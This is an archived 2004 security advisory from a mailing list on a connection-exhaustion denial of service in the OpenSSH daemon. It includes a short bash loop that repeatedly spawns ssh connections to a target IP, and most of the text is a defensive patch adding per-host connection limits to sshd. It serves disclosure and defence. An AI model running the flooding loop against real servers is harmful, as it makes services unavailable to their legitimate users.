| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: alpt at freaknet.org (Alpt)
Subject: The remote Openssh User-Level-Denial-Of-Service
-------------------------------------------------------------------------------
Security Advisory SA 200409-01
-------------------------------------------------------------------------------
Severity: Normal
Title: user-level-denial-of-service
Date: Septer 03, 2004
ID: 200409-01
Authors: alpt <alpt@...aknet.org>, valvoline <valvoline@...aknet.org>
-------------------------------------------------------------------------------
Synopsis
--------
A flawless into connections management and keys handshake was discovered into
openssh daemon. This could allow any malicious user to attach the service,
making it unusable.
Affected packages
-----------------
OpenSSH 3.8p1 (and later versions)
Older version can be bugged too.
Description
------------
Sshd, and all others daemons based upon the same behaviour of connection,
contains a problem regarding the MAX connections allowed. If a malicious
user can open MAX connections to the server's daemon, than this will get
in a classical Denial Of Service.
Even this's not an hot/fresh news, we propose a well self-contained proof
of concepts for sshd and a possible clean solution for the sshd service.
The one proposed is an hard-coded solution into the authentication/login
part of the sshd.c code. However, the behaviour and the method of
connections-handling can be used both for sshd or *any* other service
containing this problem (proftpd, is bugged too).
The well known solution to this kind of attach can be a burst limit into
firewall rules and/or any other kind of traffic shaping at TCP stack and/or
kernel lavel. However, we think that this solution is slightly unefficient
for several reasons including kernel poor-performances and few control over
the single services. Also in all tests that we've done, even with a burst-limit
included in iptables level, sshd still fell in DoS.
Let's look at sshd. It contains some routines used for user authentication
and keys management during user logon. During handshake the system make a
fork, using the returned child to serve the client and making the parent
able to receive other requests. During this phase, the system waits for an
user input and then it validates the user password and/or public key.
At this point there're neither user connection control nor control about
max opened sockets per user.
A malicious user can attack the server opening more connections than the
maximum supported by the operating system, creating a denial of service.
A simple bash script will illustrate the flawless. Beware that this proof
of concept will saturate the client machine! For an efficient version of
the proof-of-concept, just apply the included patch to ssh client and set
the maximum wished connections.
-->CUT HERE<--
#!/bin/sh
TRUE=1;
while [ $TRUE ]
do
ssh 10.10.1.200 &
done
-->CUT HERE<--
Impact
------
Any user on any machine has the ability to get in DoS a remote ssh daemon,
using a simple bash script or a patched version of ssh client (see above).
Workaround
----------
Apply the patch or wait for an official patch from openssh.
Note: The patch removes the MaxStartups option and adds two new options for
the sshd_config file: MaxConnections and MaxAcceptsPerHost.
See the ./sshd_config.5 man page for more info.
Repository
----------
The document you are currently reading is here:
http://www.freaknet.org/alpt/src/Openssh-UlDoS/sa200409-19.txt
You can download the patch for openssh here:
http://www.freaknet.org/alpt/src/Openssh-UlDoS/patch-ssh-3.8.1p1-uDoS.patch
the PoF patch is here:
http://www.freaknet.org/alpt/src/Openssh-UlDoS/pof-uDoS-openssh-3.8.1p1.patch
If you are looking for the right version of Openssh download this:
http://www.freaknet.org/alpt/src/Openssh-UlDoS/openssh-3.8.1p1.tar.gz
If you want to check the md5sum of the files use these:
http://www.freaknet.org/alpt/src/Openssh-UlDoS/openssh-3.8.1p1.tar.gz.md5
http://www.freaknet.org/alpt/src/Openssh-UlDoS/patch-ssh-3.8.1p1-uDoS.patch.md5
http://www.freaknet.org/alpt/src/Openssh-UlDoS/pof-uDoS-openssh-3.8.1p1.patch.md5
--
:wq!
"I don't know nothing" The One Who reached the Thinking Matter '.'
[ Alpt --- Freaknet Medialab ]
[ GPG Key ID 441CF0EE ]
[ Key fingerprint = 8B02 26E8 831A 7BB9 81A9 5277 BFF8 037E 441C F0EE ]
--
!(v^v)?spj:vrl;
keyID=1d67b4dd;
-------------- next part --------------
diff -Nru ORIGINAL-3.8.1p1/Makefile.in openssh-3.8.1p1-alptpatch/Makefile.in
--- ORIGINAL-3.8.1p1/Makefile.in 2004-02-18 04:35:11.000000000 +0100
+++ openssh-3.8.1p1-alptpatch/Makefile.in 2004-09-05 19:51:11.000000000 +0200
@@ -77,6 +77,7 @@
SSHDOBJS=sshd.o auth-rhosts.o auth-passwd.o auth-rsa.o auth-rh-rsa.o \
sshpty.o sshlogin.o servconf.o serverloop.o uidswap.o \
+ inet.o accept.o \
auth.o auth1.o auth2.o auth-options.o session.o \
auth-chall.o auth2-chall.o groupaccess.o \
auth-skey.o auth-bsdauth.o auth2-hostbased.o auth2-kbdint.o \
diff -Nru ORIGINAL-3.8.1p1/accept.c openssh-3.8.1p1-alptpatch/accept.c
--- ORIGINAL-3.8.1p1/accept.c 1970-01-01 01:00:00.000000000 +0100
+++ openssh-3.8.1p1-alptpatch/accept.c 2004-09-07 15:52:03.941042280 +0200
@@ -0,0 +1,231 @@
+/* This file is part of Netsukuku
+ * (c) Copyright 2004 Andrea Lo Pumo aka AlpT <alpt@...aknet.org>
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
+ * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+ * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
+ * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
+ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+ /* accept.c: This is how it works:
+ * When a new accept is made add_accept is called. It first updates the accept
+ * table and then, if the accept_tbl isn't full add the new accept in the tbl.
+ * If the accept_tbl is full the connection is dropped.
+ * Each accept in the table last for free_accept_time after the close of that
+ * connection, so if an host has fulled the accept_tbl has to wait
+ * free_accept_time of seconds to be able reconnect again.
+ */
+
+#include <sys/types.h>
+#include <signal.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+
+#include "accept.h"
+#include "xmalloc.h"
+#include "log.h"
+
+
+void init_accept_tbl(int startups, int accepts, int time)
+{
+ int i;
+
+ max_connections=startups;
+ max_accepts_per_host=accepts;
+ free_accept_time=time;
+ accept_idx=accept_sidx=0;
+
+ accept_tbl=(struct accept_table *)xmalloc(sizeof(struct accept_table)*max_connections);
+ memset(accept_tbl, '\0', sizeof(struct accept_table)*max_connections);
+
+ for(i=0; i<max_connections; i++) {
+ accept_tbl[i].pid=(pid_t *)xmalloc(sizeof(pid_t)*max_accepts_per_host);
+ memset(accept_tbl[i].pid, '\0', sizeof(pid_t)*max_accepts_per_host);
+
+ accept_tbl[i].closed=(unsigned char *)xmalloc(sizeof(unsigned char)*max_accepts_per_host);
+ memset(accept_tbl[i].closed, '\0', sizeof(unsigned char)*max_accepts_per_host);
+
+ accept_tbl[i].acp_t=(time_t *)xmalloc(sizeof(time_t)*max_accepts_per_host);
+ memset(accept_tbl[i].acp_t, '\0', sizeof(time_t)*max_accepts_per_host);
+ }
+}
+
+void destroy_accept_tbl(void)
+{
+ int i;
+ if(!accept_tbl)
+ return;
+ for(i=0; i<max_connections; i++) {
+ xfree(accept_tbl[i].pid);
+ xfree(accept_tbl[i].closed);
+ xfree(accept_tbl[i].acp_t);
+ }
+ xfree(accept_tbl);
+ accept_tbl=0;
+}
+
+
+void update_accept_tbl(void)
+{
+ int i,e,k;
+ time_t cur_t;
+
+ if(update_accept_tbl_mutex)
+ return;
+ else
+ update_accept_tbl_mutex=1;
+
+ time(&cur_t);
+
+ for(i=0; i < max_connections; i++) {
+ if(!accept_tbl[i].ip.len)
+ continue;
+ if(accept_tbl[i].accepts) {
+ for(e=0; e<max_accepts_per_host; e++) {
+ if(!accept_tbl[i].acp_t[e])
+ break;
+ k=kill(accept_tbl[i].pid[e], 0);
+ debug("ACPT: Updating tbl: cur_t: %d, accept_tbl[%d].acp_t[%d]:%d+%d, accept_tbl[i].pid[e]: %d, kill=%d (ESRCH=%d)",
+ cur_t, i,e, accept_tbl[i].acp_t[e], free_accept_time, accept_tbl[i].pid[e], k, ESRCH);
+ if((accept_tbl[i].closed[e] || (k==-1 && errno==ESRCH)) &&
+ accept_tbl[i].acp_t[e]+free_accept_time <= cur_t) {
+ debug("ACPT: removing from tbl");
+ accept_tbl[i].accepts--;
+ accept_tbl[i].acp_t[e]=0;
+ accept_tbl[i].closed[e]=0;
+ accept_tbl[i].pid[e]=0;
+ if(!accept_tbl[i].accepts)
+ memset(&accept_tbl[i].ip, '\0', sizeof(inet_prefix));
+ }
+ }
+ }
+ }
+
+ update_accept_tbl_mutex=0;
+}
+
+int find_ip_acpt(inet_prefix ip)
+{
+ int i;
+
+ for(i=0; i<max_accepts_per_host; i++) {
+ if(!memcmp(&accept_tbl[i].ip, &ip, sizeof(inet_prefix)))
+ return i;
+ }
+
+ return -1;
+}
+
+int find_first_free(void)
+{
+ int i;
+
+ for(i=0; i<max_connections; i++) {
+ if(!accept_tbl[i].accepts)
+ return i;
+ }
+
+ return -1;
+}
+
+int is_ip_acpt_free(inet_prefix ip, int *index)
+{
+ int idx;
+
+ update_accept_tbl();
+
+ if((idx=find_ip_acpt(ip))==-1)
+ if((idx=find_first_free())==-1)
+ return -1;
+ debug("ACPT: accept_tbl[idx].accepts: %d, max_acp: %d", accept_tbl[idx].accepts, max_accepts_per_host);
+ if(accept_tbl[idx].accepts > max_accepts_per_host)
+ return -1;
+
+ *index=idx;
+ return 0;
+}
+
+int find_free_acp_t(int idx)
+{
+ int e;
+
+ for(e=0; e < max_accepts_per_host; e++) {
+ if(!accept_tbl[idx].acp_t[e])
+ return e;
+ }
+
+ return -1; /*This happens if the rq_tbl is full for the "rq" request*/
+}
+
+int add_accept(inet_prefix ip)
+{
+ int err, idx, cl;
+ time_t cur_t;
+
+ if((err=is_ip_acpt_free(ip, &idx)))
+ return err;
+
+ time(&cur_t);
+
+ if((cl=find_free_acp_t(idx))==-1)
+ return -1;
+ accept_tbl[idx].accepts++;
+ accept_tbl[idx].acp_t[cl]=cur_t;
+ accept_tbl[idx].closed[cl]=0;
+ memcpy(&accept_tbl[idx].ip, &ip, sizeof(inet_prefix));
+
+ /*This global var will be given to the thread*/
+ accept_idx=idx;
+ accept_sidx=cl;
+
+ return 0;
+}
+
+void del_accept(int idx)
+{
+ if(!accept_tbl[idx].accepts)
+ return;
+
+ if(accept_tbl[idx].acp_t[accept_sidx]) {
+ accept_tbl[idx].accepts--;
+ accept_tbl[idx].acp_t[accept_sidx]=0;
+ accept_tbl[idx].closed[accept_sidx]=0;
+ if(!accept_tbl[idx].accepts)
+ memset(&accept_tbl[idx].ip, '\0', sizeof(inet_prefix));
+ accept_sidx--;
+ }
+}
+
+int close_accept(void)
+{
+ if(!accept_tbl[accept_idx].accepts)
+ return -1;
+
+ accept_tbl[accept_idx].closed[accept_sidx]=0;
+
+ update_accept_tbl();
+
+ return 0;
+}
+
+void add_accept_pid(pid_t pid)
+{
+ accept_tbl[accept_idx].pid[accept_sidx]=pid;
+ debug("ACPT: Added pig %d in accept_tbl[%d].pid[%d]", accept_tbl[accept_idx].pid[accept_sidx], accept_idx, accept_sidx);
+}
diff -Nru ORIGINAL-3.8.1p1/accept.h openssh-3.8.1p1-alptpatch/accept.h
--- ORIGINAL-3.8.1p1/accept.h 1970-01-01 01:00:00.000000000 +0100
+++ openssh-3.8.1p1-alptpatch/accept.h 2004-09-07 15:52:25.986690832 +0200
@@ -0,0 +1,73 @@
+/* This file is part of Netsukuku
+ * (c) Copyright 2004 Andrea Lo Pumo aka AlpT <alpt@...aknet.org>
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
+ * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+ * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
+ * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
+ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#include <time.h>
+#include "inet.h"
+
+#define MAX_CONNECTIONS 500
+#define MAX_ACCEPTS 50
+#define FREE_ACCEPT_TIME 5 /*in seconds*/
+
+/*This struct keep tracks of single connection to the server.
+ * The thread_daemon who handle the connection knows the connection
+ * position in the accept_tbl
+ */
+struct accept_table
+{
+ inet_prefix ip; /*Ip of the node connected*/
+ unsigned char accepts; /*Number of connection from this node*/
+ pid_t *pid; /*The pid of each child that have accepted the conn*/
+ unsigned char *closed; /*Each element of this array is 1 or 0. It indicates if the connection has
+ been closed*/
+ time_t *acp_t; /*The time when the connection was accepted. The "accepts" counter
+ will decrement when one of the acp_t+FREE_ACCEPT_TIME will
+ be <= current_time AND (the relative pid will be non existent OR
+ the relative closed element will be == 1)
+ */
+};
+
+/*This struct keeps all the info regarding each node connected*/
+struct accept_table *accept_tbl;
+
+/*accept_idx it the position of the accept_tbl of a thread.
+ *accept_sidx is the second index, it is used for example in pid[accept_sidx]
+ *note: this var are used only in the child and the child doesn't need to modify them!
+ */
+int accept_idx, accept_sidx;
+
+int update_accept_tbl_mutex;
+
+int max_connections, max_accepts_per_host, free_accept_time;
+
+void init_accept_tbl(int startups, int accepts, int time);
+void destroy_accept_tbl(void);
+void update_accept_tbl(void);
+int find_ip_acpt(inet_prefix ip);
+int find_first_free(void);
+int is_ip_acpt_free(inet_prefix ip, int *index);
+int find_free_acp_t(int idx);
+int add_accept(inet_prefix ip);
+void del_accept(int idx);
+int close_accept(void);
+void add_accept_pid(pid_t pid);
diff -Nru ORIGINAL-3.8.1p1/inet.c openssh-3.8.1p1-alptpatch/inet.c
--- ORIGINAL-3.8.1p1/inet.c 1970-01-01 01:00:00.000000000 +0100
+++ openssh-3.8.1p1-alptpatch/inet.c 2004-09-07 16:05:00.921923232 +0200
@@ -0,0 +1,100 @@
+/* This file is part of Netsukuku
+ * (c) Copyright 2004 Andrea Lo Pumo aka AlpT <alpt@...aknet.org>
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
+ * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+ * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
+ * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
+ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include "inet.h"
+#include "xmalloc.h"
+
+char *inet_to_str(inet_prefix *ip)
+{
+ char *dst;
+
+ if(ip->family==AF_INET) {
+ struct in_addr src;
+
+ memcpy(&src, ip->data, ip->len);
+ dst=xmalloc(INET_ADDRSTRLEN);
+ inet_ntop(ip->family, &src, dst, INET_ADDRSTRLEN);
+ }
+ else if(ip->family==AF_INET6) {
+ struct in6_addr src;
+
+ memcpy(&src, ip->data, ip->len);
+ dst=xmalloc(INET6_ADDRSTRLEN);
+ inet_ntop(ip->family, &src, dst, INET6_ADDRSTRLEN);
+ }
+
+ return dst;
+}
+
+int inet_to_sockaddr(inet_prefix *ip, u_short port, struct sockaddr *dst, socklen_t *dstlen)
+{
+ memset(dst, '\0', sizeof(struct sockaddr));
+
+ dst->sa_family=ip->family;
+ port=htons(port);
+ memcpy(dst->sa_data, &port, sizeof(u_short));
+
+ if(ip->family==AF_INET)
+ memcpy(dst->sa_data+sizeof(u_short), ip->data, ip->len);
+ else if(ip->family==AF_INET6)
+ memcpy(dst->sa_data+sizeof(u_short)+sizeof(u_int), ip->data, ip->len);
+ else
+ return -1;
+
+ if(!dstlen)
+ return 0;
+
+ *dstlen=ip->len;
+
+ return 0;
+}
+
+int sockaddr_to_inet(struct sockaddr *ip, inet_prefix *dst, u_short *port)
+{
+ u_short po;
+
+ memset(dst, '\0', sizeof(inet_prefix));
+
+ dst->family=ip->sa_family;
+ memcpy(&po, &ip->sa_data, sizeof(u_short));
+ if(port)
+ *port=ntohs(po);
+
+ if(ip->sa_family==AF_INET) {
+ memcpy(dst->data, &ip->sa_data+sizeof(u_short), sizeof(struct in_addr));
+ dst->data[0]=ntohl(dst->data[0]);
+ dst->len=sizeof(struct in_addr);
+ } else if(ip->sa_family==AF_INET6) {
+ memcpy(dst->data, &ip->sa_data+sizeof(u_short)+sizeof(int), sizeof(struct in6_addr));
+ dst->len=sizeof(struct in6_addr);
+ } else
+ return -1;
+
+ return 0;
+}
diff -Nru ORIGINAL-3.8.1p1/inet.h openssh-3.8.1p1-alptpatch/inet.h
--- ORIGINAL-3.8.1p1/inet.h 1970-01-01 01:00:00.000000000 +0100
+++ openssh-3.8.1p1-alptpatch/inet.h 2004-09-07 15:51:40.199651520 +0200
@@ -0,0 +1,37 @@
+/* This file is part of Netsukuku
+ * (c) Copyright 2004 Andrea Lo Pumo aka AlpT <alpt@...aknet.org>
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
+ * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
+ * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
+ * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
+ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
+ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
+ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#include <asm/types.h>
+#include <sys/socket.h>
+
+typedef struct
+{
+ __u8 family;
+ __u16 len;
+ __u32 data[4];
+} inet_prefix;
+
+char *inet_to_str(inet_prefix *ip);
+int inet_to_sockaddr(inet_prefix *ip, u_short port, struct sockaddr *dst, socklen_t *dstlen);
+int sockaddr_to_inet(struct sockaddr *ip, inet_prefix *dst, u_short *port);
diff -Nru ORIGINAL-3.8.1p1/log.h openssh-3.8.1p1-alptpatch/log.h
--- ORIGINAL-3.8.1p1/log.h 2003-10-02 08:12:37.000000000 +0200
+++ openssh-3.8.1p1-alptpatch/log.h 2004-09-05 20:58:08.000000000 +0200
@@ -16,7 +16,7 @@
#define SSH_LOG_H
#include <syslog.h> /* Needed for LOG_AUTHPRIV (if present) */
-
+#include <stdarg.h>
/* Supported syslog facilities and levels. */
typedef enum {
SYSLOG_FACILITY_DAEMON,
diff -Nru ORIGINAL-3.8.1p1/servconf.c openssh-3.8.1p1-alptpatch/servconf.c
--- ORIGINAL-3.8.1p1/servconf.c 2004-01-23 12:03:10.000000000 +0100
+++ openssh-3.8.1p1-alptpatch/servconf.c 2004-09-07 13:17:36.658883312 +0200
@@ -23,6 +23,7 @@
#include "cipher.h"
#include "kex.h"
#include "mac.h"
+#include "accept.h"
static void add_listen_addr(ServerOptions *, char *, u_short);
static void add_one_listen_addr(ServerOptions *, char *, u_short);
@@ -92,9 +93,14 @@
options->protocol = SSH_PROTO_UNKNOWN;
options->gateway_ports = -1;
options->num_subsystems = 0;
- options->max_startups_begin = -1;
- options->max_startups_rate = -1;
+ /*
+ *options->max_startups_begin = -1;
+ *options->max_startups_rate = -1;
+ */
options->max_startups = -1;
+ options->max_connections = -1;
+ options->max_accepts_per_host = -1;
+ options->max_accepts_per_host_time = -1;
options->banner = NULL;
options->use_dns = -1;
options->client_alive_interval = -1;
@@ -206,12 +212,19 @@
options->allow_tcp_forwarding = 1;
if (options->gateway_ports == -1)
options->gateway_ports = 0;
- if (options->max_startups == -1)
- options->max_startups = 10;
- if (options->max_startups_rate == -1)
- options->max_startups_rate = 100; /* 100% */
+/* if (options->max_startups_rate == -1)
+ options->max_startups_rate = 100; // 100 %
if (options->max_startups_begin == -1)
options->max_startups_begin = options->max_startups;
+*/
+ if (options->max_connections == -1)
+ options->max_connections = MAX_CONNECTIONS;
+ if (options->max_accepts_per_host == -1)
+ options->max_accepts_per_host = 10;
+ if (options->max_accepts_per_host_time == -1)
+ options->max_accepts_per_host_time = FREE_ACCEPT_TIME;
+ if (options->max_startups == -1)
+ options->max_startups = options->max_connections*options->max_accepts_per_host;
if (options->use_dns == -1)
options->use_dns = 1;
if (options->client_alive_interval == -1)
@@ -262,8 +275,8 @@
sPermitUserEnvironment, sUseLogin, sAllowTcpForwarding, sCompression,
sAllowUsers, sDenyUsers, sAllowGroups, sDenyGroups,
sIgnoreUserKnownHosts, sCiphers, sMacs, sProtocol, sPidFile,
- sGatewayPorts, sPubkeyAuthentication, sXAuthLocation, sSubsystem, sMaxStartups,
- sBanner, sUseDNS, sHostbasedAuthentication,
+ sGatewayPorts, sPubkeyAuthentication, sXAuthLocation, sSubsystem, sMaxStartups,
+ sMaxAcceptsPerHost, sMaxConnections, sBanner, sUseDNS, sHostbasedAuthentication,
sHostbasedUsesNameFromPacketOnly, sClientAliveInterval,
sClientAliveCountMax, sAuthorizedKeysFile, sAuthorizedKeysFile2,
sGssAuthentication, sGssCleanupCreds,
@@ -356,7 +369,11 @@
{ "protocol", sProtocol },
{ "gatewayports", sGatewayPorts },
{ "subsystem", sSubsystem },
- { "maxstartups", sMaxStartups },
+ /*It's useless now, because max_startups=max_connections*max_accepts_per_host
+ *{ "maxstartups", sMaxStartups },
+ */
+ { "maxconnections", sMaxConnections },
+ { "maxacceptsperhost", sMaxAcceptsPerHost },
{ "banner", sBanner },
{ "usedns", sUseDNS },
{ "verifyreversemapping", sDeprecated },
@@ -846,6 +863,7 @@
options->num_subsystems++;
break;
+ /*It's useless now, because max_startups=max_connections*max_accepts_per_host
case sMaxStartups:
arg = strdelim(&cp);
if (!arg || *arg == '\0')
@@ -868,6 +886,36 @@
options->max_startups = options->max_startups_begin;
break;
+ */
+ case sMaxAcceptsPerHost:
+ arg = strdelim(&cp);
+ if (!arg || *arg == '\0')
+ fatal("%s line %d: Missing MaxAcceptsPerHost spec.",
+ filename, linenum);
+ if ((n = sscanf(arg, "%d:%d",
+ &options->max_accepts_per_host,
+ &options->max_accepts_per_host_time)) != 2 && n != 1)
+ fatal("%s line %d: Illegal MaxAcceptsPerHost spec.",
+ filename, linenum);
+ else if(n == 1) {
+ options->max_accepts_per_host_time = FREE_ACCEPT_TIME;
+ debug("Default sMaxAcceptsPerHost time: %d", options->max_accepts_per_host_time);
+ }
+
+ if(options->max_accepts_per_host > MAX_ACCEPTS)
+ fatal("%s line %d: MaxAcceptsPerHost is > of MAX_ACCEPTS (%d).",
+ filename, linenum, MAX_ACCEPTS);
+ debug("sMaxAcceptsPerHost: %d", options->max_accepts_per_host);
+ if(options->max_accepts_per_host_time < 0)
+ fatal("%s line %d: MaxAcceptsPerHost time is < of 0.",
+ filename, linenum);
+ debug("sMaxAcceptsPerHost time: %d", options->max_accepts_per_host_time);
+ break;
+
+ case sMaxConnections:
+ intptr = &options->max_connections;
+ goto parse_int;
+
case sBanner:
charptr = &options->banner;
goto parse_filename;
diff -Nru ORIGINAL-3.8.1p1/servconf.h openssh-3.8.1p1-alptpatch/servconf.h
--- ORIGINAL-3.8.1p1/servconf.h 2003-12-31 01:37:34.000000000 +0100
+++ openssh-3.8.1p1-alptpatch/servconf.h 2004-09-07 13:23:40.303600912 +0200
@@ -107,9 +107,10 @@
char *subsystem_name[MAX_SUBSYSTEMS];
char *subsystem_command[MAX_SUBSYSTEMS];
- int max_startups_begin;
- int max_startups_rate;
int max_startups;
+ int max_connections;
+ int max_accepts_per_host;
+ int max_accepts_per_host_time;
char *banner; /* SSH-2 banner message */
int use_dns;
int client_alive_interval; /*
diff -Nru ORIGINAL-3.8.1p1/session.c openssh-3.8.1p1-alptpatch/session.c
--- ORIGINAL-3.8.1p1/session.c 2004-04-16 14:47:55.000000000 +0200
+++ openssh-3.8.1p1-alptpatch/session.c 2004-09-06 22:10:35.000000000 +0200
@@ -57,6 +57,7 @@
#include "canohost.h"
#include "session.h"
#include "monitor_wrap.h"
+#include "accept.h"
#if defined(KRB5) && defined(USE_AFS)
#include <kafs.h>
@@ -2257,4 +2258,7 @@
*/
if (!use_privsep || mm_is_monitor())
session_destroy_all(session_pty_cleanup2);
+
+ debug("ACPT: do_cleanup: Destroying the accept_tbl");
+ destroy_accept_tbl();
}
diff -Nru ORIGINAL-3.8.1p1/sshd.c openssh-3.8.1p1-alptpatch/sshd.c
--- ORIGINAL-3.8.1p1/sshd.c 2004-03-21 23:36:01.000000000 +0100
+++ openssh-3.8.1p1-alptpatch/sshd.c 2004-09-07 16:05:43.680422952 +0200
@@ -85,6 +85,7 @@
#include "monitor_wrap.h"
#include "monitor_fdpass.h"
+#include "accept.h"
#ifdef LIBWRAP
#include <tcpd.h>
#include <syslog.h>
@@ -737,6 +738,7 @@
* of (max_startups_rate/100). the probability increases linearly until
* all connections are dropped for startups > max_startups
*/
+/* Now it's useless, accept.c does the dirty job
static int
drop_connection(int startups)
{
@@ -759,6 +761,7 @@
debug("drop_connection: p %g, r %g", p, r);
return (r < p) ? 1 : 0;
}
+*/
static void
usage(void)
@@ -785,6 +788,7 @@
socklen_t fromlen;
fd_set *fdset;
struct sockaddr_storage from;
+ struct sockaddr from_tmp;
const char *remote_ip;
int remote_port;
FILE *f;
@@ -792,6 +796,7 @@
char ntop[NI_MAXHOST], strport[NI_MAXSERV];
char *line;
int listen_sock, maxfd;
+ inet_prefix ip;
int startup_p[2];
int startups = 0;
Key *key;
@@ -950,6 +955,12 @@
/* Fill in default values for those options not explicitly set. */
fill_default_server_options(&options);
+ debug("ACPT: Initializing the accept_tbl: max_startups: %d, max_connections: %d, "
+ "max_accepts_per_host: %d, max_accept_per_host_time: %d",
+ options.max_startups, options.max_connections, options.max_accepts_per_host,
+ options.max_accepts_per_host_time);
+ init_accept_tbl(options.max_connections, options.max_accepts_per_host, options.max_accepts_per_host_time);
+
/* Check that there are no remaining arguments. */
if (optind < ac) {
fprintf(stderr, "Extra argument %s.\n", av[optind]);
@@ -1278,7 +1289,7 @@
if (!FD_ISSET(listen_socks[i], fdset))
continue;
fromlen = sizeof(from);
- newsock = accept(listen_socks[i], (struct sockaddr *)&from,
+ newsock = accept(listen_socks[i], (struct sockaddr *)&from_tmp,
&fromlen);
if (newsock < 0) {
if (errno != EINTR && errno != EWOULDBLOCK)
@@ -1290,15 +1301,33 @@
close(newsock);
continue;
}
+ /*Drop connection now is useless
if (drop_connection(startups) == 1) {
debug("drop connection #%d", startups);
close(newsock);
